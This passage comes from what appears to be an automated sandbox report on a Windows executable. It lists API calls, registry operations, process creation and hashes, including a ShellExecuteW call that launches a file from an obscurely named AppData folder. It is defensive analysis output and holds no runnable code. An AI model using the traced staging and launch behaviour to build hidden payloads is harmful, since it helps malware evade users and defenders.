                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                  • String ID: OC
                                                                  • API String ID: 334405425-1597561874
                                                                  • Opcode ID: b44a8702a8552a5d57075b821dffc7744ca75562ec938dd21493636622f58a5f
                                                                  • Instruction ID: b3ac21fa57660b76ceab9e03e352ea593c7fbc5daa3d747aca45c0be544cf33f
                                                                  • Opcode Fuzzy Hash: b44a8702a8552a5d57075b821dffc7744ca75562ec938dd21493636622f58a5f
                                                                  • Instruction Fuzzy Hash: 3B21A771900215EACF106FA5CE48A9E7EB0AF09354F70423BF610B51E0D7BD8A81DA5D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 736 405a3c-405a48 737 405a49-405a7d GetTickCount GetTempFileNameW 736->737 738 405a8c-405a8e 737->738 739 405a7f-405a81 737->739 741 405a86-405a89 738->741 739->737 740 405a83 739->740 740->741
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00405A5A
                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403227,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A75
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                  • API String ID: 1716503409-2042855515
                                                                  • Opcode ID: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                                  • Instruction ID: 485616ab74b01dad4b6f2028e8278cd76642f71c5b474b9ae6064b4a8122c260
                                                                  • Opcode Fuzzy Hash: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                                  • Instruction Fuzzy Hash: 76F03076700204BFDB008F59DD45FAFB7A8EB95750F10803AEE45E7290E6B09A548F64

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 742 40232f-402375 call 402c2d call 402b38 * 2 RegCreateKeyExW 749 4029c5-4029d4 742->749 750 40237b-402383 742->750 752 402385-402392 call 402b38 lstrlenW 750->752 753 402396-402399 750->753 752->753 756 4023a9-4023ac 753->756 757 40239b-4023a8 call 402b1b 753->757 759 4023bd-4023d1 RegSetValueExW 756->759 760 4023ae-4023b8 call 402fa0 756->760 757->756 764 4023d3 759->764 765 4023d6-4024b0 RegCloseKey 759->765 760->759 764->765 765->749 767 402791-402798 765->767 767->749
                                                                  APIs
                                                                  • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                                  • lstrlenW.KERNEL32(0040B578,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,0040B578,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                                  • RegCloseKey.KERNELBASE(?,?,?,0040B578,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateValuelstrlen
                                                                  • String ID:
                                                                  • API String ID: 1356686001-0
                                                                  • Opcode ID: 21349ac20d1ca4d9ceea6c5711b10ee8709a8512efbdc3bac0f841d0c2be42d8
                                                                  • Instruction ID: 92be6db62a7debd6b64078ffb9939270950072c0cf2fb5a53bae11f9be139373
                                                                  • Opcode Fuzzy Hash: 21349ac20d1ca4d9ceea6c5711b10ee8709a8512efbdc3bac0f841d0c2be42d8
                                                                  • Instruction Fuzzy Hash: 8F1190B1A00108BFEB00AFA1DE8AEAF777CEB54358F11403AF504B71D0D7B85D409A68

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 768 401f08-401f30 call 402b38 GetFileVersionInfoSizeW 771 4029c5-4029d4 768->771 772 401f36-401f44 GlobalAlloc 768->772 772->771 774 401f4a-401f57 GetFileVersionInfoW 772->774 776 401f59-401f70 VerQueryValueW 774->776 777 401f8f 774->777 776->777 778 401f72-401f8c call 405ce8 * 2 776->778 777->771 778->777
                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                  • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                  • VerQueryValueW.VERSION(?,0040A014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                    • Part of subcall function 00405CE8: wsprintfW.USER32 ref: 00405CF5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                  • String ID:
                                                                  • API String ID: 1404258612-0
                                                                  • Opcode ID: 90b437ca501e41d769246acc3526ee78bfc1f7e4b716acdc87d1f01b62c577f6
                                                                  • Instruction ID: 985e6d37b82d88455cf37f94a5598379594e562e2ebdb1bdff2800a7dde94c7a
                                                                  • Opcode Fuzzy Hash: 90b437ca501e41d769246acc3526ee78bfc1f7e4b716acdc87d1f01b62c577f6
                                                                  • Instruction Fuzzy Hash: B6111CB1A00109AFDB01DFA5C945DAEBBB5EF45344F21417AF500F62E1E7359E40DB29
                                                                  APIs
                                                                    • Part of subcall function 0040504B: lstrlenW.KERNEL32(Completed,00000000,0041BB2D,756F23A0,?,?,?,?,?,?,?,?,?,00403103,00000000,?), ref: 00405083
                                                                    • Part of subcall function 0040504B: lstrlenW.KERNEL32(00403103,Completed,00000000,0041BB2D,756F23A0,?,?,?,?,?,?,?,?,?,00403103,00000000), ref: 00405093
                                                                    • Part of subcall function 0040504B: lstrcatW.KERNEL32(Completed,00403103,00403103,Completed,00000000,0041BB2D,756F23A0), ref: 004050A6
                                                                    • Part of subcall function 0040504B: SetWindowTextW.USER32(Completed,Completed), ref: 004050B8
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050DE
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050F8
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405106
                                                                    • Part of subcall function 0040551C: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 00405541
                                                                    • Part of subcall function 0040551C: CloseHandle.KERNEL32(?), ref: 0040554E
                                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 3585118688-0
                                                                  • Opcode ID: da604fa8e9e7d963ef1a0ddac39428bf5e34623edae9b326b56b4d77e9e0aba2
                                                                  • Instruction ID: b5f73ffbd4a1fa015f0c2796452332fd916e9637aff9300d1e3c67c2e8cabf32
                                                                  • Opcode Fuzzy Hash: da604fa8e9e7d963ef1a0ddac39428bf5e34623edae9b326b56b4d77e9e0aba2
                                                                  • Instruction Fuzzy Hash: C911AD71900204EBCF109FA1CE449EE7AB1EF04315F20443BF901B61E1C7798A929F99
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 00405541
                                                                  • CloseHandle.KERNEL32(?), ref: 0040554E
                                                                  Strings
                                                                  • Error launching installer, xrefs: 0040552F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                  • Instruction ID: cf9fdeca5e40bc41ee8c953bab838b17ccc92df15d25727223da148b4173978b
                                                                  • Opcode Fuzzy Hash: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                  • Instruction Fuzzy Hash: 41E0ECB4500309ABEB00AF64DD49E6F7BBDEB04344F008575A950F2150D774D9148B68
                                                                  APIs
                                                                    • Part of subcall function 00406035: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\yMXFgPOdf2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,756F3420,004033E1), ref: 00406098
                                                                    • Part of subcall function 00406035: CharNextW.USER32(?,?,?,00000000), ref: 004060A7
                                                                    • Part of subcall function 00406035: CharNextW.USER32(?,"C:\Users\user\Desktop\yMXFgPOdf2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,756F3420,004033E1), ref: 004060AC
                                                                    • Part of subcall function 00406035: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,756F3420,004033E1), ref: 004060BF
                                                                  • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756F3420,004033E1), ref: 00403216
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 4115351271-3645488871
                                                                  • Opcode ID: d87fad949052cfa03a28e6d8598cf07e7846d7f9d3ec73566398795b30735e76
                                                                  • Instruction ID: 8e868994f3d2bbac58875734e477fdd5edfa4fc47c6a96a7a7d594daf79fb191
                                                                  • Opcode Fuzzy Hash: d87fad949052cfa03a28e6d8598cf07e7846d7f9d3ec73566398795b30735e76
                                                                  • Instruction Fuzzy Hash: FBD0C92214693062D652376A7D4AFCF0D0C8F063AEF26407BF804B51E69B7C0AC649FE
                                                                  APIs
                                                                    • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
                                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
                                                                  • RegCloseKey.KERNELBASE(?,?,?,0040B578,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Enum$CloseOpenValue
                                                                  • String ID:
                                                                  • API String ID: 167947723-0
                                                                  • Opcode ID: 7cb3e1a340c37208c1fb63bbc66ec0d7d04384155e110c3177caa8bd9d1a98e2
                                                                  • Instruction ID: c9031ee09ce8bee28904ed1c285a81cc521ca788ea043c2b6b00717a23bbda57
                                                                  • Opcode Fuzzy Hash: 7cb3e1a340c37208c1fb63bbc66ec0d7d04384155e110c3177caa8bd9d1a98e2
                                                                  • Instruction Fuzzy Hash: 0EF0F4B1600205AFE7108F65DE8CABF767CEF40358F21443EF445B21C0DAB85D409B29
                                                                  APIs
                                                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens,?), ref: 00401E3D
                                                                  Strings
                                                                  • C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens, xrefs: 00401E26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: ExecuteShell
                                                                  • String ID: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens
                                                                  • API String ID: 587946157-1930900407
                                                                  • Opcode ID: 93d64ffd1e537835371bfd6882af04086357290893017d01e8ef83964071ead1
                                                                  • Instruction ID: 1911b2733719e8945681546b31a0b6b9e0b67ed3329d32444ff49021a4b7533d
                                                                  • Opcode Fuzzy Hash: 93d64ffd1e537835371bfd6882af04086357290893017d01e8ef83964071ead1
                                                                  • Instruction Fuzzy Hash: 63F0F675750200ABDB006FB5DD4AE9E33B4AB64729F200937F501F70C1D6FC88419629
                                                                  APIs
                                                                    • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                                  • RegCloseKey.KERNELBASE(?,?,?,0040B578,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3677997916-0
                                                                  • Opcode ID: 714f38590da9a58201fff3fc134d9017d60c90884747fc52343908f3d48ea486
                                                                  • Instruction ID: 546e44f20ace30403b8508f380f469907ed62c60589eb312f7573fc2108540a6
                                                                  • Opcode Fuzzy Hash: 714f38590da9a58201fff3fc134d9017d60c90884747fc52343908f3d48ea486
                                                                  • Instruction Fuzzy Hash: A911A071910205EEDB14CFA1D6585AFB7B4EF44359F60843FE042B72D0D6B85A81DB1A
                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                  • Instruction ID: adb52dfa00387397cd87161f5118bdb5a91708942fcdcec178a456792abf2482
                                                                  • Opcode Fuzzy Hash: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                  • Instruction Fuzzy Hash: 5101F4316202209BE7095B389D09B6A76D8E711719F10863FF851F72F1D6B8CC429B4C
                                                                  APIs
                                                                    • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
